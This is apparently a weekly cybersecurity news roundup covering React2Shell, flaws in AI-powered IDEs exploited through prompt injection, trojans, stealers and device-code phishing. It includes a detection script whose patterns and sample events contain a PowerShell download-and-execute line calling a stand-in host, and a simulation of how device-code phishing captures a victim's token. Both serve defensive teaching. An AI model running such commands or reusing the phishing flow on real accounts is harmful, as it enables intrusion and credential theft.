The cybersecurity landscape continues its relentless evolution, with a notable surge in rapid exploitation of critical vulnerabilities and sophisticated attacks targeting both established systems and emerging technologies. This past week saw a critical flaw in a widely used web framework weaponized within hours of disclosure, a batch of vulnerabilities in AI-powered developer tools, and a record-breaking distributed denial-of-service (DDoS) attack. Attackers are discovering, publishing, and exploiting new weaknesses at unprecedented speed, often within hours, underscoring the need for swift patching and layered defenses.
The accelerating pace of cyber threats, coupled with the increasing use of AI in both offensive and defensive capacities, presents a complex challenge for organizations worldwide. From data exfiltration to large-scale disruptions, the methods employed by malicious actors are becoming more agile and diverse. This report delves into the most significant developments from the past week, offering insights into the evolving threat landscape and the strategies being employed by defenders.
Max Severity React Flaw Comes Under Attack
A critical security vulnerability impacting React Server Components (RSC), tracked as CVE-2025-55182 and nicknamed React2Shell, was exploited within hours of its public disclosure. The flaw carries a CVSS score of 10.0 and allows unauthenticated remote code execution with no prerequisites. Amazon reported observing attack attempts originating from infrastructure linked to Chinese hacking groups, including Earth Lamia and Jackpot Panda, shortly after the vulnerability was made public. Several cybersecurity firms, including Coalition, Fastly, and Wiz, have corroborated these findings, noting widespread exploitation efforts by multiple threat actors.
The Shadowserver Foundation reported a significant decrease in vulnerable IP addresses detected for the React2Shell flaw, dropping from over 77,000 on December 5, 2025, to approximately 29,000 by December 7. Despite this reduction, a substantial number of vulnerable systems remain exposed, with a notable concentration in the U.S., Germany, and China. These figures come from internet-wide scanning, so they only count exposed hosts; internal deployments of affected frameworks are not reflected and still need to be inventoried and patched. The swift exploitation of this flaw highlights the critical importance of rapid patch deployment for widely used software frameworks.
Top News in Cybersecurity
Over 30 Flaws in AI-Powered IDEs
Security researcher Ari Marzouk has detailed over 30 security vulnerabilities discovered in various AI-powered Integrated Development Environments (IDEs). These vulnerabilities, collectively termed IDEsaster, combine prompt injection with legitimate IDE features to achieve data exfiltration and remote code execution. Marzouk noted that AI IDEs often leave existing IDE features out of their threat model, even though those features become weaponizable once an autonomous AI agent can drive them. Patches for these issues have been released, with Anthropic acknowledging the associated risks.
Chinese Hackers Use BRICKSTORM to Target U.S. Entities
The U.S. government has issued an advisory concerning the use of a backdoor named BRICKSTORM by China-linked threat actors, including UNC5221 and Warp Panda. This sophisticated backdoor is designed for persistence in VMware vSphere and Windows environments, enabling stealthy access and secure command-and-control capabilities. The ongoing use of BRICKSTORM raises concerns about China’s sustained ability to infiltrate critical infrastructure and government networks undetected for extended periods, often utilizing living-off-the-land techniques to evade detection.
GoldFactory Targets Southeast Asia with Bogus Banking Apps
The financially motivated cybercriminal group GoldFactory has launched a new campaign targeting mobile users in Indonesia, Thailand, and Vietnam. This operation involves distributing modified banking applications that deliver Android malware. Group-IB reported identifying over 300 unique samples of these applications, leading to nearly 2,200 infections in Indonesia. The attacks often impersonate government entities and local brands, luring victims into installing malware through deceptive links sent via messaging apps. These links redirect users to fake app store pages, resulting in the deployment of remote access trojans that abuse Android’s accessibility services for remote control.
Cloudflare Blocks Record 29.7 Tbps DDoS Attack
Cloudflare successfully mitigated the largest distributed denial-of-service (DDoS) attack on record, measuring 29.7 terabits per second (Tbps). The attack, which lasted 69 seconds, originated from the AISURU botnet-for-hire, previously linked to numerous hyper-volumetric DDoS attacks. The target of this specific attack was not disclosed, but the botnet has previously focused on telecommunications providers, gaming companies, hosting providers, and financial services. Cloudflare also mitigated a 14.1 billion packets per second (Bpps) DDoS attack from the same botnet, which is estimated to comprise between 1 and 4 million infected hosts globally.
Brazil Hit by Banking Trojan Spread via WhatsApp Worm
Brazilian users are currently facing multiple campaigns distributing banking malware through WhatsApp Web. One campaign, attributed to the threat actor Water Saci, delivers a variant of the Casbaneiro banking trojan, while another cluster, tracked by Sophos as STAC3150, deploys the Astaroth banking trojan. These attacks utilize malicious VBS or HTA files within ZIP archives, which then launch PowerShell to retrieve secondary payloads. This includes scripts that collect WhatsApp user data and ultimately install the Astaroth malware. The trust inherent in messages from known contacts is exploited to bypass user caution, increasing the likelihood of malware execution.
Trending CVEs
The rapid exploitation of newly discovered vulnerabilities is a persistent threat. Organizations must prioritize patching and security updates to mitigate risks. This week’s notable CVEs include a range of issues across different software and platforms, emphasizing the need for continuous vigilance and proactive security management.
This week’s list includes: CVE-2025-6389 (Sneeit Framework plugin), CVE-2025-66516 (Apache Tika), CVE-2025-55182 (React), CVE-2025-9491 (Microsoft Windows), CVE-2025-10155, CVE-2025-10156, CVE-2025-10157 (Picklescan), CVE-2025-48633, CVE-2025-48572 (Google Android), CVE-2025-11699 (nopCommerce), CVE-2025-64775 (Apache Struts), CVE-2025-59789 (Apache bRPC), CVE-2025-13751, CVE-2025-13086, CVE-2025-12106 (OpenVPN), CVE-2025-13658 (Industrial Video & Control Longwatch), CVE-2024-36424 (K7 Ultimate Security), CVE-2025-66412 (Angular), CVE-2025-13510 (Iskra iHUB and iHUB Lite), CVE-2025-13372, CVE-2025-64460 (Django), CVE-2025-13486 (Advanced Custom Fields: Extended plugin), CVE-2025-64772 (Sony INZONE Hub), CVE-2025-64983 (SwitchBot), CVE-2025-31649, CVE-2025-31361 (Dell ControlVault), CVE-2025-47151 (Entr’ouvert Lasso), CVE-2025-66373 (Akamai), CVE-2025-13654 (Duc), CVE-2025-13032 (Avast), CVE-2025-33211, CVE-2025-33201 (NVIDIA Triton), CVE-2025-66399 (Cacti), CVE-2025-20386, CVE-2025-20387 (Splunk), and CVE-2025-66476 (Vim for Windows).
Around the Cyber World
Compromised USBs Used for Crypto Miner Delivery
An ongoing campaign since September 2024 has been observed utilizing USB drives to spread cryptocurrency miners across infected hosts. The latest iteration uses a batch script to launch a dropper DLL that deploys PrintMiner, which then installs additional payloads like XMRig. The malware sits in a hidden folder on the drive and is launched through a shortcut file, so a user browsing the drive sees only the shortcut and has little indication of infection. Concurrently, a separate campaign targets Linux systems with a Mirai-derived botnet that deploys a stealthy, fileless cryptocurrency miner, dynamically configured at runtime.
Fake Cryptocurrency Investment Domain Seized
The U.S. Department of Justice’s Scam Center Task Force has seized Tickmilleas[.]com, a domain used by scammers operating from Burma to perpetrate cryptocurrency investment fraud against Americans. The website was disguised as a legitimate investment platform, leading victims to believe they were seeing lucrative returns before their funds were stolen. Meta has also removed approximately 2,000 accounts associated with the same scam compound, and several fraudulent apps hosted on Google Play Store and Apple App Store that were linked to the domain have been taken down. Separately, Cambodian officials raided a cyber scam compound and arrested 28 suspects, primarily Vietnamese nationals, as cyber scam operations increasingly shift to new locations within the region.
Portugal Modifies Cybercrime Law to Exempt Researchers
Portugal has amended its cybercrime law to provide a legal safe harbor for white hat security research. Under specific conditions, such activities are now exempt from punishment. These conditions include the intention to improve cybersecurity through disclosure, not seeking financial gain, promptly reporting vulnerabilities to the system owner, deleting data obtained within 10 days of a fix, and adhering to data privacy regulations like GDPR. This move mirrors similar legislative proposals in other countries aimed at fostering responsible vulnerability disclosure.
CastleRAT Malware Detailed
The remote access trojan (RAT) known as CastleRAT has been observed in the wild, with both Python and C versions documented. The C build is noted to be more powerful and may include additional features. CastleRAT gathers system information, including computer name, username, and IP address, which is then transmitted to its command-and-control (C2) server. It also possesses the capability to download and execute further files, offering attackers a remote shell to run commands on compromised machines. This malware is attributed to a threat actor known as TAG-150.
DoJ Indicts Brothers for Wiping 96 Government Databases
Two brothers from Virginia, Muneeb and Sohaib Akhter, have been indicted by the U.S. Department of Justice for allegedly conspiring to steal sensitive information and deleting 96 government databases. The incident occurred shortly after they were terminated from their contractor roles. The databases contained information related to Freedom of Information Act requests and sensitive investigative files from multiple federal agencies, including the IRS and DHS. The brothers reportedly used an artificial intelligence tool to inquire about clearing system logs of their actions. This indictment follows a previous sentencing in 2015 for similar offenses, highlighting a concerning pattern of behavior.
U.K. NCSC Debuts Proactive Notifications
The U.K.’s National Cyber Security Centre (NCSC) has initiated a testing phase for its new Proactive Notifications service. This service, delivered in partnership with cybersecurity firm Netcraft, aims to inform organizations of vulnerabilities present within their environments. The notifications are based on publicly available information and internet scanning, designed to responsibly alert system owners and aid in protecting their services. This proactive approach complements traditional reactive incident response.
FinCEN Ransomware Trend Analysis Reveals Drop in Payments
A recent analysis by the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) indicates a decrease in reported ransomware incidents in 2024, with 1,476 incidents noted following law enforcement actions against major ransomware groups. Ransomware-related payments reported by financial institutions totaled approximately $734 million, down from $1.1 billion in 2023. The median ransomware payment in 2024 was $155,257, and the most common payment range between 2022 and 2024 was below $250,000. Akira led in reported incidents, while BlackCat received the highest total payment amount.
Bangladeshi Student Behind New Botnet
A student hacker from Bangladesh is reportedly behind a new botnet targeting WordPress and cPanel servers. The operation uses a botnet panel to sell access to compromised websites, which are typically injected with the Beima PHP web shell. Government and education sectors are the main targets, accounting for 76% of the websites offered for sale. The perpetrator claims on Telegram to be selling access to over 5,200 compromised websites to fund their education, with Chinese threat actors making up the majority of customers.
U.S. State Department Offers $10m Reward for Iranian Hacker Duo
The U.S. State Department has announced a $10 million reward for information leading to the capture of two Iranian nationals, Fatemeh Sedighian Kashi and Mohammad Bagher Shirinkar. These individuals are linked to Iran’s cyber operations and allegedly work for a company associated with the Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC). The State Department states that members of this entity have caused significant financial damage and disruption to U.S. businesses and government agencies through coordinated cyber and information operations targeting critical infrastructure sectors across the U.S., Europe, and the Middle East.
New Arkanix and Sryxen Stealers Spotted
Two new information stealers, Arkanix and Sryxen, are being marketed for their ability to steal sensitive data and generate quick financial gains. Sryxen, written in C++, uses advanced techniques, including DPAPI decryption and a bypass for Chrome’s new App-Bound Encryption by leveraging the DevTools Protocol. Its anti-analysis features are notably sophisticated. These disclosures coincide with a campaign known as AIRedScam, which utilizes malicious AI tools shared on GitHub to distribute infostealers, specifically targeting cybersecurity professionals seeking automation tools for enumeration and reconnaissance.
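The WhatsApp campaigns above (script files in ZIP archives launching PowerShell to fetch a second stage) and the Sryxen App-Bound Encryption bypass both leave a recognisable footprint in process-creation telemetry. The following is an added detection example, not code from any of the vendors or researchers cited on this page. It assumes Sysmon-style events (image, parent image, command line) that have already been parsed into dictionaries; the sample events are constructed. The browser rule rests on an assumption not stated above: DevTools Protocol access from outside the browser requires Chrome or Edge to be started with `--remote-debugging-port` or `--remote-debugging-pipe`, which is the usual way stealers reach the decrypted cookie store, and which ordinary users never do.

```python
"""Two detection rules over process-creation events (added example, constructed data).

Rule 1: a script host (wscript/cscript/mshta) spawning PowerShell, with the severity
        raised when the command line contains download/encoded-command patterns.
Rule 2: a Chromium-based browser started with remote debugging enabled by a parent that
        is not a known developer tool (assumed indicator of DevTools-based cookie theft).
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Alert:
    rule: str
    severity: str
    pid: int
    detail: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
# Parents that legitimately launch a browser with remote debugging. Assumed allowlist;
# tune it to the developer tooling actually deployed in your estate.
DEBUG_PARENT_ALLOWLIST = {"code.exe", "chromedriver.exe", "msedgedriver.exe"}

PS_SUSPICIOUS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b"
    r"|(?:-enc(?:odedcommand)?|-e)\b|frombase64string",
    re.IGNORECASE,
)
REMOTE_DEBUG = re.compile(r"--remote-debugging-(?:port|pipe)", re.IGNORECASE)
HEADLESS = re.compile(r"--headless", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Alert]:
    alerts: List[Alert] = []
    for e in events:
        image = basename(e["image"])
        parent = basename(e.get("parent_image", ""))
        cmd = e.get("cmdline", "")
        detail = f"{parent} -> {image}: {cmd}"
        if image in POWERSHELL and parent in SCRIPT_HOSTS:
            sev = "high" if PS_SUSPICIOUS.search(cmd) else "medium"
            alerts.append(Alert("script_host_spawns_powershell", sev, e["pid"], detail))
        if image in BROWSERS and REMOTE_DEBUG.search(cmd) and parent not in DEBUG_PARENT_ALLOWLIST:
            # Headless + remote debugging from an unknown parent is the stealer pattern;
            # a visible window with the flag is more likely a developer and gets medium.
            sev = "high" if HEADLESS.search(cmd) else "medium"
            alerts.append(Alert("browser_remote_debugging", sev, e["pid"], detail))
    return alerts


# Constructed sample telemetry: three true positives, three benign events.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo"},
    {"pid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""},
    {"pid": 4202, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Temp"},
    {"pid": 5300, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "cmdline": "chrome.exe --headless --remote-debugging-port=9222 "
                "--user-data-dir=\"C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\""},
    {"pid": 5344, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "chrome.exe --remote-debugging-port=9229"},
    {"pid": 5360, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "chrome.exe https://example.invalid/"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule} pid={a.pid} {a.detail}")
```

Run against the sample, the two PowerShell events and the headless Chrome launch fire; the VS Code debug session and the ordinary browser start do not. Expect some noise from web-automation frameworks in developer fleets, which is why the allowlist and the headless distinction are there rather than a flat match on the flag.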
FBI Warns of Virtual Kidnapping Ransom Scams
The U.S. Federal Bureau of Investigation (FBI) has issued a warning about a rise in virtual kidnapping ransom scams. Perpetrators contact victims via text message, falsely claiming to have kidnapped a loved one and demanding ransom. They often provide seemingly authentic photos or videos, sometimes sent with timed message features to limit the victim’s ability to verify their authenticity, as fabricated proof-of-life. These scams exploit publicly available images from social media platforms and other online sources.
Russian Hackers Spoof European Security Events in Phishing Wave
Threat actors originating from Russia have intensified their targeting of Microsoft and Google environments by exploiting OAuth and Device Code authentication workflows for credential phishing. These attacks involve creating fake websites that impersonate legitimate European security events. Users who register for these events are tricked into granting unauthorized access to their accounts. In the device code variant, the victim never hands over a password: they sign in at the genuine identity provider, MFA included, and enter a code the attacker generated, which authorizes the attacker's client to receive tokens for the victim's account. A notable tactic in this wave includes offering “live support” via messaging apps to walk targeted users through the process. These campaigns are attributed to a cyber espionage group known as UTA0355.
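To make the device code abuse concrete, here is an added in-memory simulation of the OAuth 2.0 device authorization grant (RFC 8628) with an attacker as the client and a victim as the approving user. It is not code from the researchers who track this activity, nor from Microsoft or Google; the identity provider, client ID, verification URL and IP addresses are all constructed. Two mitigations are modelled: refusing the device code flow outright for clients that do not need it, and rejecting approval when the device that requested the code and the user approving it are clearly not in the same place (an illustrative check; real providers expose equivalents through conditional-access or sign-in risk policies).

```python
"""Device authorization grant phishing, simulated end to end (added example).

The attacker requests a code from the real authorization server, sends the
user_code and verification_uri to the victim inside a lure, and polls the token
endpoint until the victim approves. No network, no real provider: all constructed.
"""
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Pending:
    client_id: str
    scope: str
    requester_ip: str           # where the device_authorization request came from
    device_code: str
    approved_by: Optional[str] = None
    approver_ip: Optional[str] = None
    denied: bool = False


class AuthorizationServer:
    """Tiny in-memory identity provider: RFC 8628 endpoints plus two mitigations."""

    def __init__(self, allow_device_code: bool = True, require_ip_match: bool = False):
        self.allow_device_code = allow_device_code
        self.require_ip_match = require_ip_match
        self.pending: Dict[str, Pending] = {}     # user_code -> record
        self.by_device: Dict[str, Pending] = {}   # device_code -> record
        self.verification_uri = "https://login.example.invalid/device"  # constructed

    def device_authorization(self, client_id: str, scope: str, requester_ip: str) -> Dict:
        """Step 1. Any public client can ask for a code; the victim is not involved yet."""
        if not self.allow_device_code:
            return {"error": "unauthorized_client"}  # mitigation: flow disabled by policy
        rec = Pending(client_id, scope, requester_ip, secrets.token_urlsafe(24))
        user_code = f"{secrets.randbelow(10**4):04d}-{secrets.randbelow(10**4):04d}"
        self.pending[user_code] = rec
        self.by_device[rec.device_code] = rec
        return {"device_code": rec.device_code, "user_code": user_code,
                "verification_uri": self.verification_uri, "expires_in": 900, "interval": 5}

    def verify_user_code(self, user_code: str, username: str, user_ip: str) -> str:
        """Step 2. The victim signs in at the genuine page and types the code from the lure."""
        rec = self.pending.get(user_code)
        if rec is None:
            return "invalid_code"
        if self.require_ip_match and rec.requester_ip != user_ip:
            rec.denied = True                     # mitigation: requester and approver differ
            return "denied_ip_mismatch"
        rec.approved_by, rec.approver_ip = username, user_ip
        return "approved"

    def token(self, client_id: str, device_code: str) -> Dict:
        """Step 3. The client polls with its device_code; after approval it gets the victim's token."""
        rec = self.by_device.get(device_code)
        if rec is None or rec.client_id != client_id:
            return {"error": "invalid_grant"}
        if rec.denied:
            return {"error": "access_denied"}
        if rec.approved_by is None:
            return {"error": "authorization_pending"}
        return {"access_token": f"tok-{secrets.token_hex(8)}", "token_type": "Bearer",
                "scope": rec.scope, "subject": rec.approved_by}


def run_phish(server: AuthorizationServer, attacker_ip: str = "198.51.100.7",
              victim_ip: str = "203.0.113.42") -> Dict:
    """Play the exchange and return the verification outcome merged with the final token reply."""
    step1 = server.device_authorization("public-mail-client", "Mail.Read offline_access", attacker_ip)
    if "error" in step1:
        return step1
    # First poll, before the victim has done anything.
    assert server.token("public-mail-client", step1["device_code"])["error"] == "authorization_pending"
    # Lure: "to register for the event, open <verification_uri> and enter <user_code>".
    outcome = server.verify_user_code(step1["user_code"], "victim@example.invalid", victim_ip)
    return {"verify": outcome, **server.token("public-mail-client", step1["device_code"])}


if __name__ == "__main__":
    print(run_phish(AuthorizationServer()))                         # attacker receives victim's token
    print(run_phish(AuthorizationServer(require_ip_match=True)))    # denied_ip_mismatch / access_denied
    print(run_phish(AuthorizationServer(allow_device_code=False)))  # unauthorized_client
```

The point the first run makes is that every security control the victim sees is genuine: the real sign-in page, the real MFA prompt, a URL on the provider's own domain. What the victim cannot see is that the code binds their session to a client the attacker controls. That is why blocking the device code flow for accounts and applications that do not need it is the control with the most leverage; the IP comparison in the second run is a heuristic that helps when the flow must stay enabled.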
Shanya PaaS Fuels New Attacks
A packer-as-a-service (PaaS) offering called Shanya has emerged as a tool for decrypting and loading malicious programs capable of disabling endpoint security solutions. The attack chain exploits a vulnerable legitimate driver and a malicious unsigned kernel driver to achieve its objectives. The user-mode component identifies and terminates security processes and services by sending kill commands to the malicious kernel driver. This driver then abuses the vulnerable legitimate driver to gain write access, enabling the termination and deletion of protection products. Shanya has been used in ransomware operations, including Medusa, Akira, Qilin, and Crytox, and has also distributed CastleRAT.
Cybersecurity Tools
RAPTOR: This open-source AI-powered security tool automates code scanning, fuzzing, vulnerability analysis, and exploit generation. It is designed to efficiently test software for bugs, validate vulnerabilities, and conduct OSS forensics by chaining multiple tools and using an AI agent for guidance.
Google Threat Intelligence Browser Extension: Aimed at security analysts and threat researchers, this extension highlights suspicious IPs, URLs, domains, and file hashes directly within the browser, providing instant context for threat investigation and collaboration.
Disclaimer: These tools are intended for educational and research purposes only and may not have undergone comprehensive security testing. Improper use could lead to harm. Users are advised to review code, test in isolated environments, and comply with all applicable laws and regulations.
Conclusion
The week’s developments underscore a continuing trend where innovation in technology is quickly mirrored by advancements in exploitation. The rapid discovery and weaponization of vulnerabilities, alongside the dual-use nature of AI, demand a proactive and adaptive approach to cybersecurity. Staying informed, implementing timely patches, and fostering a culture of shared knowledge are critical for navigating this dynamic threat landscape. The consistent emergence of new attack vectors emphasizes that vigilance and a layered defense strategy remain paramount.

